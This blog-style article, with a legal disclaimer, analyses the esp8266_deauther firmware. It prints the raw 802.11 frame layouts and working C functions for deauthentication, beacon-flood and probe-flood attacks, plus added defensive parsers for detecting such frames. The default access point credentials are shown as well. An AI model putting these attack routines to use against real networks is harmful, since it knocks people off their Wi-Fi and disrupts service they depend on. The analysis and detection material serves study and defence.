Implementing esp8266_deauther and some thoughts, part 4: source code analysis

This series of articles is for technical research only. Please comply with the relevant laws (the Cybersecurity Law of the People's Republic of China) and do not use these techniques to attack others!

1 Software configuration

1.1 WiFi-related configuration


This part of the configuration lives in wifi.h, which sets the location of the web files and the WiFi settings, such as the login IP address (192.168.4.1 by default) and the default subnet mask (255.255.255.0).

// Server and other global objects
ESP8266WebServer server(80);
DNSServer dnsServer;
IPAddress apIP(192, 168, 4, 1);
IPAddress netMsk(255, 255, 255, 0);
File fsUploadFile;

// current WiFi mode and config
uint8_t wifiMode = WIFI_MODE_OFF;

bool   wifi_config_hidden        = false;
bool   wifi_config_captivePortal = false;
String wifi_config_ssid;
String wifi_config_password;
String wifi_config_path;

1.2 Core configuration


This part of the configuration lives in Setting.h: the version number, attack timeout, WiFi channel, SSID, password, whether the SSID is hidden, language, and so on. For example, the SSID used to log in defaults to pwned, the password defaults to deauther, and the default language is English. I had originally planned to add a Chinese localization pack to make things easier for Chinese hobbyists, but then found that a Chinese language pack was already included in V2.1. The languages supported by the V2.1 web page are: cn Chinese, cs Czech, de German, en English, es Spanish, fi Finnish, fr French, it Italian, ro Romanian, ru Russian and tlh Klingon.

bool changed = false;

String version = VERSION;

bool beaconChannel = false;
bool autosave = true;
bool beaconInterval = false;
bool cli = true;
bool displayInterface = USE_DISPLAY;
bool webInterface = true;
bool webSpiffs = false;
bool randomTX = false;
bool ledEnabled = true;
bool serialEcho = true;

uint32_t attackTimeout = 600;
uint32_t autosaveTime = 10000;
uint32_t displayTimeout = 600;
uint16_t deauthsPerTarget = 20;
uint16_t chTime = 384;
uint16_t minDeauths = 3;
uint8_t forcePackets = 1;
uint8_t channel = 9;
uint8_t deauthReason = 1;
uint8_t *macSt;
uint8_t *macAP;
uint8_t probesPerSSID = 1;

String ssid = "pwned";
String password = "deauther";
bool hidden = false;
bool captivePortal = true;
String lang = "en";

1.3 Other configuration
The remaining configuration involves some key data structures, which I have not studied in depth.

2 Analysis of the core network attack code

2.1 Deauth attack

(1) Structure of the deauth attack packet deauthPacket[26]

uint8_t deauthPacket[26] = {
    /*  0 - 1  */ 0xC0, 0x00,                         // type, subtype c0: deauth (a0: disassociate)
    /*  2 - 3  */ 0x00, 0x00,                         // duration (SDK takes care of that)
    /*  4 - 9  */ 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, // receiver (target)
    /* 10 - 15 */ 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, // source (ap)
    /* 16 - 21 */ 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, // BSSID (ap)
    /* 22 - 23 */ 0x00, 0x00,                         // fragment & sequence number
    /* 24 - 25 */ 0x01, 0x00                          // reason code (1 = unspecified reason)
};

(2) Core deauth attack code

bool Attack::deauthDevice(uint8_t* apMac, uint8_t* stMac, uint8_t reason, uint8_t ch) {
    if (!stMac) return false;  // exit when station mac is null

    // Serial.println("Deauthing "+macToStr(apMac)+" -> "+macToStr(stMac)); // for debugging

    bool success = false;

    // build deauth packet
    packetSize = sizeof(deauthPacket);
    memcpy(&deauthPacket[4], stMac, 6);
    memcpy(&deauthPacket[10], apMac, 6);
    memcpy(&deauthPacket[16], apMac, 6);
    deauthPacket[24] = reason;

    // send deauth frame
    deauthPacket[0] = 0xc0;

    if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) {
        success = true;
        deauth.packetCounter++;
    }

    // send disassociate frame
    deauthPacket[0] = 0xa0;

    if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) {
        success = true;
        deauth.packetCounter++;
    }

    // send another packet, this time from the station to the accesspoint
    if (!macBroadcast(stMac)) { // but only if the packet isn't a broadcast
        // build deauth packet
        memcpy(&deauthPacket[4], apMac, 6);
        memcpy(&deauthPacket[10], stMac, 6);
        memcpy(&deauthPacket[16], stMac, 6);

        // send deauth frame
        deauthPacket[0] = 0xc0;

        if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) {
            success = true;
            deauth.packetCounter++;
        }

        // send disassociate frame
        deauthPacket[0] = 0xa0;

        if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) {
            success = true;
            deauth.packetCounter++;
        }
    }

    if (success) deauth.time = currentTime;

    return success;
}
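As an added example (not code from esp8266_deauther), here is the receiving side of the 26-byte layout above: a parser a monitor-mode sniffer can use to recognise deauthentication and disassociation frames, and a counter for those claiming to come from a BSSID the operator owns, which is the pattern a wireless IDS alarms on. The KickFrame type, both function names and the two sample frames are constructed here.

```c
#include <stdint.h>
#include <string.h>
/* Decoded deauthentication/disassociation frame, following the 26-byte
 * deauthPacket layout above: frame control (2), duration (2), addr1 (6),
 * addr2 (6), addr3 (6), sequence (2), reason (2). Constructed example. */
typedef struct {
    uint8_t  subtype;      /* 0xC0 = deauthentication, 0xA0 = disassociation */
    uint8_t  receiver[6];  /* addr1: station being kicked; ff:ff:.. = everyone */
    uint8_t  source[6];    /* addr2: claimed sender */
    uint8_t  bssid[6];     /* addr3 */
    uint16_t reason;       /* little-endian reason code, 1 = unspecified */
    int      broadcast;    /* 1 when addr1 is the broadcast address */
} KickFrame;

/* Returns 1 and fills *out if buf holds a deauth or disassoc frame, else 0. */
int parse_kick_frame(const uint8_t *buf, size_t len, KickFrame *out) {
    static const uint8_t bcast[6] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF};
    if (len < 26) return 0;
    /* byte 0: bits 2-3 = type (00 = management), bits 4-7 = subtype */
    if ((buf[0] & 0x0C) != 0x00) return 0;
    uint8_t subtype = buf[0] & 0xF0;
    if (subtype != 0xC0 && subtype != 0xA0) return 0;
    out->subtype = subtype;
    memcpy(out->receiver, &buf[4], 6);
    memcpy(out->source, &buf[10], 6);
    memcpy(out->bssid, &buf[16], 6);
    out->reason = (uint16_t)(buf[24] | (buf[25] << 8));
    out->broadcast = memcmp(out->receiver, bcast, 6) == 0;
    return 1;
}

/* Counts deauth/disassoc frames carrying our BSSID in addr3. Bursts of
 * these that our AP never transmitted are what a WIDS alarms on. */
int count_kicks_for_bssid(const uint8_t *const *frames, const size_t *lens,
                          size_t n, const uint8_t bssid[6]) {
    int hits = 0;
    for (size_t i = 0; i < n; i++) {
        KickFrame f;
        if (parse_kick_frame(frames[i], lens[i], &f) && memcmp(f.bssid, bssid, 6) == 0)
            hits++;
    }
    return hits;
}

/* Constructed samples: a broadcast deauth from BSSID cc:cc:cc:cc:cc:cc with
 * reason code 1, and a beacon (subtype 0x80) the parser must ignore. */
static const uint8_t sample_deauth[26] = { 0xC0, 0x00, 0x00, 0x00,
    0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
    0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x00, 0x00, 0x01, 0x00 };
static const uint8_t sample_beacon[26] = { 0x80, 0x00 };
```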

2.2 Beacon attack

(1) Structure of the beacon attack packet beaconPacket[68] (the listing that follows is in fact probePacket[68]; the 109-byte beaconPacket array is listed under 2.3)

uint8_t probePacket[68] = {
    /*  0 - 1  */ 0x40, 0x00,                         // Type: Probe Request
    /*  2 - 3  */ 0x00, 0x00,                         // Duration: 0 microseconds
    /*  4 - 9  */ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, // Destination: Broadcast
    /* 10 - 15 */ 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, // Source: random MAC
    /* 16 - 21 */ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, // BSS Id: Broadcast
    /* 22 - 23 */ 0x00, 0x00,                         // Sequence number (will be replaced by the SDK)
    /* 24 - 25 */ 0x00, 0x20,                         // Tag: Set SSID length, Tag length: 32
    /* 26 - 57 */ 0x20, 0x20, 0x20, 0x20,             // SSID
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
    /* 58 - 59 */ 0x01, 0x08, // Tag Number: Supported Rates (1), Tag length: 8
    /* 60 */ 0x82,            // 1(B)
    /* 61 */ 0x84,            // 2(B)
    /* 62 */ 0x8b,            // 5.5(B)
    /* 63 */ 0x96,            // 11(B)
    /* 64 */ 0x24,            // 18
    /* 65 */ 0x30,            // 24
    /* 66 */ 0x48,            // 36
    /* 67 */ 0x6c             // 54
};

(2) Core beacon attack code

bool Attack::sendBeacon(uint8_t* mac, const char* ssid, uint8_t ch, bool wpa2) {
    packetSize = sizeof(beaconPacket);

    if (wpa2) {
        beaconPacket[34] = 0x31;
    } else {
        beaconPacket[34] = 0x21;
        packetSize      -= 26;
    }

    int ssidLen = strlen(ssid);

    if (ssidLen > 32) ssidLen = 32;

    memcpy(&beaconPacket[10], mac, 6);
    memcpy(&beaconPacket[16], mac, 6);
    memcpy(&beaconPacket[38], ssid, ssidLen);

    beaconPacket[82] = ch;

    // =====
    uint16_t tmpPacketSize = (packetSize - 32) + ssidLen;                // calc size
    uint8_t* tmpPacket     = new uint8_t[tmpPacketSize];                 // create packet buffer
    memcpy(&tmpPacket[0], &beaconPacket[0], 38 + ssidLen);               // copy first half of packet into buffer
    tmpPacket[37] = ssidLen;                                             // update SSID length byte
    memcpy(&tmpPacket[38 + ssidLen], &beaconPacket[70], wpa2 ? 39 : 13); // copy second half of packet into buffer

    if (sendPacket(tmpPacket, tmpPacketSize, ch, settings.getForcePackets())) {
        beacon.time = currentTime;
        beacon.packetCounter++;
        delete[] tmpPacket; // free the buffer allocated with new[]
        return true;
    } else {
        delete[] tmpPacket; // free the buffer allocated with new[]
        return false;
    }
    // =====
}

2.3 Probe attack

(1) Structure of the probe attack packet probePacket[109] (the listing that follows is in fact beaconPacket[109]; the 68-byte probePacket array is listed under 2.2)

uint8_t beaconPacket[109] = {
    /*  0 - 3  */ 0x80, 0x00, 0x00, 0x00,             // Type/Subtype: management beacon frame
    /*  4 - 9  */ 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, // Destination: broadcast
    /* 10 - 15 */ 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, // Source
    /* 16 - 21 */ 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, // BSSID (same as source)

    // Fixed parameters
    /* 22 - 23 */ 0x00, 0x00,                                     // Fragment & sequence number (will be done by the SDK)
    /* 24 - 31 */ 0x83, 0x51, 0xf7, 0x8f, 0x0f, 0x00, 0x00, 0x00, // Timestamp
    /* 32 - 33 */ 0xe8, 0x03,                                     // Interval: 0x64, 0x00 => every 100ms - 0xe8, 0x03 => every 1s
    /* 34 - 35 */ 0x31, 0x00,                                     // capabilities Information

    // Tagged parameters

    // SSID parameters
    /* 36 - 37 */ 0x00, 0x20, // Tag: Set SSID length, Tag length: 32
    /* 38 - 69 */ 0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20, // SSID

    // Supported Rates
    /* 70 - 71 */ 0x01, 0x08, // Tag: Supported Rates, Tag length: 8
    /* 72 */ 0x82,            // 1(B)
    /* 73 */ 0x84,            // 2(B)
    /* 74 */ 0x8b,            // 5.5(B)
    /* 75 */ 0x96,            // 11(B)
    /* 76 */ 0x24,            // 18
    /* 77 */ 0x30,            // 24
    /* 78 */ 0x48,            // 36
    /* 79 */ 0x6c,            // 54

    // Current Channel
    /* 80 - 81 */ 0x03, 0x01, // Channel set, length
    /* 82 */ 0x01,            // Current Channel

    // RSN information
    /*  83 -  84 */ 0x30, 0x18,
    /*  85 -  86 */ 0x01, 0x00,
    /*  87 -  90 */ 0x00, 0x0f, 0xac, 0x02,
    /*  91 -  92 */ 0x02, 0x00,
    /*  93 - 100 */ 0x00, 0x0f, 0xac, 0x04, 0x00, 0x0f, 0xac, 0x04, /*Fix: changed 0x02(TKIP) to 0x04(CCMP) is default. WPA2 with TKIP not supported by many devices*/
    /* 101 - 102 */ 0x01, 0x00,
    /* 103 - 106 */ 0x00, 0x0f, 0xac, 0x02,
    /* 107 - 108 */ 0x00, 0x00};

(2) Core probe attack code

bool Attack::sendProbe(uint8_t* mac, const char* ssid, uint8_t ch) {
    packetSize = sizeof(probePacket);
    int ssidLen = strlen(ssid);

    if (ssidLen > 32) ssidLen = 32;

    memcpy(&probePacket[10], mac, 6);
    memcpy(&probePacket[26], ssid, ssidLen);

    if (sendPacket(probePacket, packetSize, ch, settings.getForcePackets())) {
        probe.time = currentTime;
        probe.packetCounter++;
        return true;
    }

    return false;
}
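As an added example (not project code), a bounds-checked walker for the tagged parameters of the beacon and probe-request layouts shown in 2.2 and 2.3. A monitor must honour the SSID tag's length byte rather than assume 32 bytes, because sendBeacon rewrites that byte and shifts the following tags forward, and it must never trust a tag length that runs past the captured frame. MgmtInfo, parse_beacon_or_probe and the sample beacon are constructed here.

```c
#include <stdint.h>
#include <string.h>

/* What a monitor extracts from a beacon or probe request, following the
 * beaconPacket[109] / probePacket[68] layouts above. Constructed example. */
typedef struct {
    uint8_t subtype;     /* 0x80 beacon, 0x40 probe request */
    uint8_t source[6];   /* addr2 */
    char    ssid[33];    /* NUL-terminated copy, at most 32 bytes */
    int     channel;     /* DS Parameter Set (tag 3), -1 if absent */
    int     has_rsn;     /* RSN element (tag 0x30) present => WPA2 */
} MgmtInfo;

/* Walks the (id, len, value) tags after the fixed fields. Each len is
 * bounds-checked before use so a crafted length cannot read past 'len'.
 * Returns 1 on success, 0 for other frame types or a malformed frame. */
int parse_beacon_or_probe(const uint8_t *buf, size_t len, MgmtInfo *out) {
    if (len < 24 || (buf[0] & 0x0C) != 0) return 0;   /* management only */
    memset(out, 0, sizeof *out);
    out->subtype = buf[0] & 0xF0;
    out->channel = -1;
    size_t off;
    if (out->subtype == 0x80) off = 36;        /* beacon: 12 bytes of fixed params */
    else if (out->subtype == 0x40) off = 24;   /* probe request: tags start at once */
    else return 0;
    memcpy(out->source, &buf[10], 6);
    while (off + 2 <= len) {
        uint8_t id = buf[off], tlen = buf[off + 1];
        const uint8_t *val = &buf[off + 2];
        if (off + 2 + tlen > len) return 0;        /* tag claims more than we have */
        if (id == 0x00) {
            if (tlen > 32) return 0;               /* longer than 802.11 allows */
            memcpy(out->ssid, val, tlen);
            out->ssid[tlen] = '\0';
        } else if (id == 0x03 && tlen == 1) {
            out->channel = val[0];
        } else if (id == 0x30) {
            out->has_rsn = 1;
        }
        off += 2 + (size_t)tlen;
    }
    return 1;
}
/* Constructed sample: open beacon from 01:02:03:04:05:06, SSID "test", channel 6 */
static const uint8_t sample_open_beacon[] = {
    0x80, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
    0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06,
    0x00, 0x00, 0x83, 0x51, 0xF7, 0x8F, 0x0F, 0x00, 0x00, 0x00, 0xE8, 0x03, 0x21, 0x00,
    0x00, 0x04, 't', 'e', 's', 't', 0x03, 0x01, 0x06 };
```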
